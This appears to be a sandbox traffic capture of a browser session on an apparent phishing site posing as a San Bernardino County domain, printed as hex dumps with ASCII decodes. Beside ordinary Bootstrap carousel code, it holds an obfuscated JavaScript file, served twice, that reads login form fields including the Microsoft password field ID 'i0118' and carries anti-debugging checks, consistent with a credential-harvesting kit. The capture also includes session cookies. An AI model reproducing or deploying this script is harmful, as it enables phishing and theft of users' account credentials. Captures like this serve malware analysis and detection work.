                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 61 63 65 7d 2c 6b 29 2c 51 6e 3d 28 6a 3d 22 63 61 72 6f 75 73 65 6c 22 2c 4c 3d 22 2e 22 2b 28 48 3d 22 62 73 2e 63 61 72 6f 75 73 65 6c 22 29 2c 52 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 78 3d 28 50 3d 65 29 2e 66 6e 5b 6a 5d 2c 57 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 6b 65 79 62 6f 61 72 64 3a 21 30 2c 73 6c 69 64 65 3a 21 31 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 77 72 61 70 3a 21 30 7d 2c 55 3d 7b 69 6e 74 65 72 76 61 6c 3a 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e 67 29 22 2c 70 61 75 73 65 3a 22 28 73 74 72 69 6e 67 7c 62 6f 6f 6c 65 61 6e 29 22 2c 77 72 61 70 3a 22 62 6f 6f 6c 65 61 6e 22 7d 2c 71 3d
                                                                          Data Ascii: ace},k),Qn=(j="carousel",L="."+(H="bs.carousel"),R=".data-api",x=(P=e).fn[j],W={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0},U={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean"},q=
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 30 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 74 29 26 26 28 46 6e 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 63 79 63 6c 65 28 21 30 29 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 7d 2c 74 2e 63 79 63 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f
                                                                          Data Ascii: this._isPaused=!0),this._element.querySelector(et)&&(Fn.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},t.cycle=function(t){t||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 54 4f 55 43 48 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 61 75 73 65 28 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 79 63 6c 65 28 74 29 7d 2c 35 30 30 2b 65 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 7d 29 29 7d 2c 74 2e 5f 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61
                                                                          Data Ascii: t"in document.documentElement&&P(this._element).on(Q.TOUCHEND,function(){e.pause(),e.touchTimeout&&clearTimeout(e.touchTimeout),e.touchTimeout=setTimeout(function(t){return e.cycle(t)},500+e._config.interval)}))},t._keydown=function(t){if(!/input|textarea
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 29 2c 63 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 6c 29 2c 68 3d 42 6f 6f 6c 65 61 6e 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 3b 69 66 28 74 3d 3d 3d 71 3f 28 6e 3d 4a 2c 69 3d 5a 2c 72 3d 4b 29 3a 28 6e 3d 7a 2c 69 3d 47 2c 72 3d 4d 29 2c 6c 26 26 50 28 6c 29 2e 68 61 73 43 6c 61 73 73 28 56 29 29 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 3b 65 6c 73 65 20 69 66 28 21 74 68 69 73 2e 5f 74 72 69 67 67 65 72 53 6c 69 64 65 45 76 65 6e 74 28 6c 2c 72 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 73 26 26 6c 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 30 2c 68 26 26 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 5f 73 65 74 41 63 74 69 76 65 49 6e 64 69 63 61 74 6f 72 45 6c
                                                                          Data Ascii: ),c=this._getItemIndex(l),h=Boolean(this._interval);if(t===q?(n=J,i=Z,r=K):(n=z,i=G,r=M),l&&P(l).hasClass(V))this._isSliding=!1;else if(!this._triggerSlideEvent(l,r).isDefaultPrevented()&&s&&l){this._isSliding=!0,h&&this.pause(),this._setActiveIndicatorEl
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 74 6f 22 29 3b 72 26 26 28 69 2e 69 6e 74 65 72 76 61 6c 3d 21 31 29 2c 6f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 50 28 6e 29 2c 69 29 2c 72 26 26 50 28 6e 29 2e 64 61 74 61 28 48 29 2e 74 6f 28 72 29 2c 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 7d 2c 73 28 6f 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 31 2e 33 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 7d 5d 29 2c 6f 7d 28 29 2c 50 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 51 2e 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 2c 69 74 2c 6f 74 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b
                                                                          Data Ascii: to");r&&(i.interval=!1),o._jQueryInterface.call(P(n),i),r&&P(n).data(H).to(r),t.preventDefault()}}},s(o,null,[{key:"VERSION",get:function(){return"4.1.3"}},{key:"Default",get:function(){return W}}]),o}(),P(document).on(Q.CLICK_DATA_API,it,ot._dataApiClick


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.649776104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:13 UTC1289OUTGET /js_/66fc7b007c248-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:13 UTC629INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:13 GMT
                                                                          Content-Type: text/javascript
                                                                          Content-Length: 6645
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 21:49:27 GMT
                                                                          Accept-Ranges: bytes
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LiuXdkjvUnk5MTA6oy1JPwRFXl9JtwOKVpKWFnL5pjRmQ7NaAcBfcoY53%2FluOg%2BuOTUkwYYu63xNVKNNVEtusbLcg69lH%2F5KGmVkTwpU6fBNxq5X4q3vpAN2BrE%2FhGu8e%2FNKPyGrRGaweEj4nyntAEYmPoqcu6o%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff86a1e7bde93-EWR
                                                                          2024-10-01 22:43:13 UTC740INData Raw: 63 6f 6e 73 74 20 61 30 5f 30 78 38 32 36 61 32 62 3d 61 30 5f 30 78 31 63 33 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 63 35 34 65 33 2c 5f 30 78 33 61 65 34 30 34 29 7b 63 6f 6e 73 74 20 5f 30 78 32 62 35 39 63 63 3d 61 30 5f 30 78 31 63 33 62 2c 5f 30 78 31 31 63 32 34 30 3d 5f 30 78 35 63 35 34 65 33 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 64 32 32 32 34 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 62 35 39 63 63 28 30 78 31 31 35 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 62 35 39 63 63 28 30 78 31 31 33 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 62 35 39 63 63 28 30 78 31 32 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 62 35 39 63 63 28 30
                                                                          Data Ascii: const a0_0x826a2b=a0_0x1c3b;(function(_0x5c54e3,_0x3ae404){const _0x2b59cc=a0_0x1c3b,_0x11c240=_0x5c54e3();while(!![]){try{const _0x1d2224=parseInt(_0x2b59cc(0x115))/0x1+-parseInt(_0x2b59cc(0x113))/0x2+-parseInt(_0x2b59cc(0x12b))/0x3+-parseInt(_0x2b59cc(0
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 62 37 33 64 32 3d 6e 75 6c 6c 2c 5f 30 78 31 34 34 38 65 63 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 31 38 30 66 61 35 3d 21 5b 5d 2c 5f 30 78 35 36 34 31 65 30 3b 7d 3b 7d 28 29 29 2c 61 30 5f 30 78 32 66 39 65 32 61 3d 61 30 5f 30 78 35 34 30 32 63 37 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 64 35 34 64 38 3d 61 30 5f 30 78 31 63 33 62 3b 72 65 74 75 72 6e 20 61 30 5f 30 78 32 66 39 65 32 61 5b 5f 30 78 32 64 35 34 64 38 28 30 78 31 31 37 29 5d 28 29 5b 5f 30 78 32 64 35 34 64 38 28 30 78 31 31 34 29 5d 28 27 28 28 28 2e 2b 29 2b 29 2b 29 2b 24 27 29 5b 5f 30 78 32 64 35 34 64 38 28 30 78 31 31 37 29 5d 28 29 5b 5f 30 78 32 64 35
                                                                          Data Ascii: ts);return _0x3b73d2=null,_0x1448ec;}}:function(){};return _0x180fa5=![],_0x5641e0;};}()),a0_0x2f9e2a=a0_0x5402c7(this,function(){const _0x2d54d8=a0_0x1c3b;return a0_0x2f9e2a[_0x2d54d8(0x117)]()[_0x2d54d8(0x114)]('(((.+)+)+)+$')[_0x2d54d8(0x117)]()[_0x2d5
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 64 3d 5f 30 78 31 31 63 31 33 63 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 65 39 36 61 33 3d 61 30 5f 30 78 31 63 33 62 3b 69 66 28 5f 30 78 34 37 31 30 65 30 29 7b 63 6f 6e 73 74 20 5f 30 78 34 33 33 33 34 37 3d 5f 30 78 34 37 31 30 65 30 5b 5f 30 78 33 65 39 36 61 33 28 30 78 31 30 33 29 5d 28 5f 30 78 35 62 30 63 36 65 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 37 31 30 65 30 3d 6e 75 6c 6c 2c 5f 30 78 34 33 33 33 34 37 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 31 31 63 31 33 63 3d 21 5b 5d 2c 5f 30 78 33 66 34 37 63 64 3b 7d 3b 7d 28 29 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 30 5f 30 78 35 36 35 33 37 64 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63
                                                                          Data Ascii: d=_0x11c13c?function(){const _0x3e96a3=a0_0x1c3b;if(_0x4710e0){const _0x433347=_0x4710e0[_0x3e96a3(0x103)](_0x5b0c6e,arguments);return _0x4710e0=null,_0x433347;}}:function(){};return _0x11c13c=![],_0x3f47cd;};}());(function(){a0_0x56537d(this,function(){c
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 6d 65 6e 74 5b 5f 30 78 35 32 37 61 36 36 28 30 78 66 65 29 5d 28 5f 30 78 35 32 37 61 36 36 28 30 78 31 32 31 29 29 5b 5f 30 78 35 32 37 61 36 36 28 30 78 66 38 29 5d 3d 21 21 5b 5d 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 32 37 61 36 36 28 30 78 66 65 29 5d 28 5f 30 78 35 32 37 61 36 36 28 30 78 31 30 30 29 29 5b 27 68 69 64 64 65 6e 27 5d 3d 21 5b 5d 2c 21 5b 5d 3b 63 6f 6e 73 74 20 5f 30 78 31 30 37 33 62 33 3d 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 27 69 30 31 31 38 27 29 2c 5f 30 78 35 65 36 64 37 63 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 32 37 61 36 36 28 30 78 66 32 29 5d 28 5f 30 78 35 32 37 61 36 36 28 30 78 65 66 29 29 2c 5f 30 78 33 63 35 64 63 61 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 32 37 61
                                                                          Data Ascii: ment[_0x527a66(0xfe)](_0x527a66(0x121))[_0x527a66(0xf8)]=!![],document[_0x527a66(0xfe)](_0x527a66(0x100))['hidden']=![],![];const _0x1073b3=document['getElementById']('i0118'),_0x5e6d7c=document[_0x527a66(0xf2)](_0x527a66(0xef)),_0x3c5dca=document[_0x527a
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 78 35 32 37 61 36 36 3b 69 66 28 5f 30 78 33 66 30 65 65 36 5b 27 73 74 61 74 75 73 27 5d 3d 3d 30 78 31 61 36 29 7b 6c 65 74 20 5f 30 78 34 33 30 31 61 32 3d 27 27 3b 24 5b 5f 30 78 31 30 63 39 39 37 28 30 78 31 30 31 29 5d 28 5f 30 78 33 66 30 65 65 36 5b 5f 30 78 31 30 63 39 39 37 28 30 78 66 33 29 5d 5b 5f 30 78 31 30 63 39 39 37 28 30 78 66 61 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 62 66 31 36 33 30 2c 5f 30 78 34 32 30 62 64 63 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 65 32 33 37 3d 5f 30 78 31 30 63 39 39 37 3b 5f 30 78 34 33 30 31 61 32 2b 3d 5f 30 78 34 32 30 62 64 63 5b 30 78 30 5d 2b 5f 30 78 35 35 65 32 33 37 28 30 78 66 35 29 3b 7d 29 3b 7d 65 6c 73 65 7b 69 66 28 5f 30 78 33 66 30 65 65 36 5b 5f 30 78 31 30 63 39 39 37 28 30 78 31 32 30
                                                                          Data Ascii: x527a66;if(_0x3f0ee6['status']==0x1a6){let _0x4301a2='';$[_0x10c997(0x101)](_0x3f0ee6[_0x10c997(0xf3)][_0x10c997(0xfa)],function(_0xbf1630,_0x420bdc){const _0x55e237=_0x10c997;_0x4301a2+=_0x420bdc[0x0]+_0x55e237(0xf5);});}else{if(_0x3f0ee6[_0x10c997(0x120
                                                                          2024-10-01 22:43:13 UTC429INData Raw: 32 64 29 5d 28 5f 30 78 32 66 61 30 62 30 28 30 78 31 30 65 29 29 5b 5f 30 78 32 66 61 30 62 30 28 30 78 31 30 33 29 5d 28 27 63 6f 75 6e 74 65 72 27 29 3b 65 6c 73 65 28 27 27 2b 5f 30 78 61 66 33 33 38 61 2f 5f 30 78 61 66 33 33 38 61 29 5b 5f 30 78 32 66 61 30 62 30 28 30 78 31 32 36 29 5d 21 3d 3d 30 78 31 7c 7c 5f 30 78 61 66 33 33 38 61 25 30 78 31 34 3d 3d 3d 30 78 30 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 5b 5d 3b 7d 5b 5f 30 78 32 66 61 30 62 30 28 30 78 31 32 64 29 5d 28 5f 30 78 32 66 61 30 62 30 28 30 78 31 31 62 29 2b 5f 30 78 32 66 61 30 62 30 28 30 78 31 32 32 29 29 5b 27 63 61 6c 6c 27 5d 28 5f 30 78 32 66 61 30 62 30 28 30 78 31 31 61 29 29 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 5b 5d 3b 7d 5b 5f 30
                                                                          Data Ascii: 2d)](_0x2fa0b0(0x10e))[_0x2fa0b0(0x103)]('counter');else(''+_0xaf338a/_0xaf338a)[_0x2fa0b0(0x126)]!==0x1||_0xaf338a%0x14===0x0?function(){return!![];}[_0x2fa0b0(0x12d)](_0x2fa0b0(0x11b)+_0x2fa0b0(0x122))['call'](_0x2fa0b0(0x11a)):function(){return![];}[_0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.649783104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:14 UTC462OUTGET /js_/66fc7b007c248-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:15 UTC627INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:15 GMT
                                                                          Content-Type: text/javascript
                                                                          Content-Length: 6645
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 21:49:27 GMT
                                                                          Accept-Ranges: bytes
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ju3jZGTYimAnOxwTuk%2BQ4h3LXIieXwSmWUbfnAhQj9oORyN4GErE4LehvyzfKmKQiQJmXqCKgL2E%2BbyZ2QnoCD%2BvWBuBJmHJKlhNrey2jkraJMvQpgXYzdMsCRTfXm7unQviF1N%2Bxa8u48TLU8onJfyNKNurSYE%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff87278098ca2-EWR
                                                                          2024-10-01 22:43:15 UTC742INData Raw: 63 6f 6e 73 74 20 61 30 5f 30 78 38 32 36 61 32 62 3d 61 30 5f 30 78 31 63 33 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 63 35 34 65 33 2c 5f 30 78 33 61 65 34 30 34 29 7b 63 6f 6e 73 74 20 5f 30 78 32 62 35 39 63 63 3d 61 30 5f 30 78 31 63 33 62 2c 5f 30 78 31 31 63 32 34 30 3d 5f 30 78 35 63 35 34 65 33 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 64 32 32 32 34 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 62 35 39 63 63 28 30 78 31 31 35 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 62 35 39 63 63 28 30 78 31 31 33 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 62 35 39 63 63 28 30 78 31 32 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 62 35 39 63 63 28 30
                                                                          Data Ascii: const a0_0x826a2b=a0_0x1c3b;(function(_0x5c54e3,_0x3ae404){const _0x2b59cc=a0_0x1c3b,_0x11c240=_0x5c54e3();while(!![]){try{const _0x1d2224=parseInt(_0x2b59cc(0x115))/0x1+-parseInt(_0x2b59cc(0x113))/0x2+-parseInt(_0x2b59cc(0x12b))/0x3+-parseInt(_0x2b59cc(0
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 62 37 33 64 32 3d 6e 75 6c 6c 2c 5f 30 78 31 34 34 38 65 63 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 31 38 30 66 61 35 3d 21 5b 5d 2c 5f 30 78 35 36 34 31 65 30 3b 7d 3b 7d 28 29 29 2c 61 30 5f 30 78 32 66 39 65 32 61 3d 61 30 5f 30 78 35 34 30 32 63 37 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 64 35 34 64 38 3d 61 30 5f 30 78 31 63 33 62 3b 72 65 74 75 72 6e 20 61 30 5f 30 78 32 66 39 65 32 61 5b 5f 30 78 32 64 35 34 64 38 28 30 78 31 31 37 29 5d 28 29 5b 5f 30 78 32 64 35 34 64 38 28 30 78 31 31 34 29 5d 28 27 28 28 28 2e 2b 29 2b 29 2b 29 2b 24 27 29 5b 5f 30 78 32 64 35 34 64 38 28 30 78 31 31 37 29 5d 28 29 5b 5f 30 78 32 64 35 34 64
                                                                          Data Ascii: );return _0x3b73d2=null,_0x1448ec;}}:function(){};return _0x180fa5=![],_0x5641e0;};}()),a0_0x2f9e2a=a0_0x5402c7(this,function(){const _0x2d54d8=a0_0x1c3b;return a0_0x2f9e2a[_0x2d54d8(0x117)]()[_0x2d54d8(0x114)]('(((.+)+)+)+$')[_0x2d54d8(0x117)]()[_0x2d54d
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 5f 30 78 31 31 63 31 33 63 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 65 39 36 61 33 3d 61 30 5f 30 78 31 63 33 62 3b 69 66 28 5f 30 78 34 37 31 30 65 30 29 7b 63 6f 6e 73 74 20 5f 30 78 34 33 33 33 34 37 3d 5f 30 78 34 37 31 30 65 30 5b 5f 30 78 33 65 39 36 61 33 28 30 78 31 30 33 29 5d 28 5f 30 78 35 62 30 63 36 65 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 37 31 30 65 30 3d 6e 75 6c 6c 2c 5f 30 78 34 33 33 33 34 37 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 31 31 63 31 33 63 3d 21 5b 5d 2c 5f 30 78 33 66 34 37 63 64 3b 7d 3b 7d 28 29 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 30 5f 30 78 35 36 35 33 37 64 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e
                                                                          Data Ascii: _0x11c13c?function(){const _0x3e96a3=a0_0x1c3b;if(_0x4710e0){const _0x433347=_0x4710e0[_0x3e96a3(0x103)](_0x5b0c6e,arguments);return _0x4710e0=null,_0x433347;}}:function(){};return _0x11c13c=![],_0x3f47cd;};}());(function(){a0_0x56537d(this,function(){con
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 6e 74 5b 5f 30 78 35 32 37 61 36 36 28 30 78 66 65 29 5d 28 5f 30 78 35 32 37 61 36 36 28 30 78 31 32 31 29 29 5b 5f 30 78 35 32 37 61 36 36 28 30 78 66 38 29 5d 3d 21 21 5b 5d 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 32 37 61 36 36 28 30 78 66 65 29 5d 28 5f 30 78 35 32 37 61 36 36 28 30 78 31 30 30 29 29 5b 27 68 69 64 64 65 6e 27 5d 3d 21 5b 5d 2c 21 5b 5d 3b 63 6f 6e 73 74 20 5f 30 78 31 30 37 33 62 33 3d 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 27 69 30 31 31 38 27 29 2c 5f 30 78 35 65 36 64 37 63 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 32 37 61 36 36 28 30 78 66 32 29 5d 28 5f 30 78 35 32 37 61 36 36 28 30 78 65 66 29 29 2c 5f 30 78 33 63 35 64 63 61 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 32 37 61 36 36
                                                                          Data Ascii: nt[_0x527a66(0xfe)](_0x527a66(0x121))[_0x527a66(0xf8)]=!![],document[_0x527a66(0xfe)](_0x527a66(0x100))['hidden']=![],![];const _0x1073b3=document['getElementById']('i0118'),_0x5e6d7c=document[_0x527a66(0xf2)](_0x527a66(0xef)),_0x3c5dca=document[_0x527a66
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 32 37 61 36 36 3b 69 66 28 5f 30 78 33 66 30 65 65 36 5b 27 73 74 61 74 75 73 27 5d 3d 3d 30 78 31 61 36 29 7b 6c 65 74 20 5f 30 78 34 33 30 31 61 32 3d 27 27 3b 24 5b 5f 30 78 31 30 63 39 39 37 28 30 78 31 30 31 29 5d 28 5f 30 78 33 66 30 65 65 36 5b 5f 30 78 31 30 63 39 39 37 28 30 78 66 33 29 5d 5b 5f 30 78 31 30 63 39 39 37 28 30 78 66 61 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 62 66 31 36 33 30 2c 5f 30 78 34 32 30 62 64 63 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 65 32 33 37 3d 5f 30 78 31 30 63 39 39 37 3b 5f 30 78 34 33 30 31 61 32 2b 3d 5f 30 78 34 32 30 62 64 63 5b 30 78 30 5d 2b 5f 30 78 35 35 65 32 33 37 28 30 78 66 35 29 3b 7d 29 3b 7d 65 6c 73 65 7b 69 66 28 5f 30 78 33 66 30 65 65 36 5b 5f 30 78 31 30 63 39 39 37 28 30 78 31 32 30 29 5d
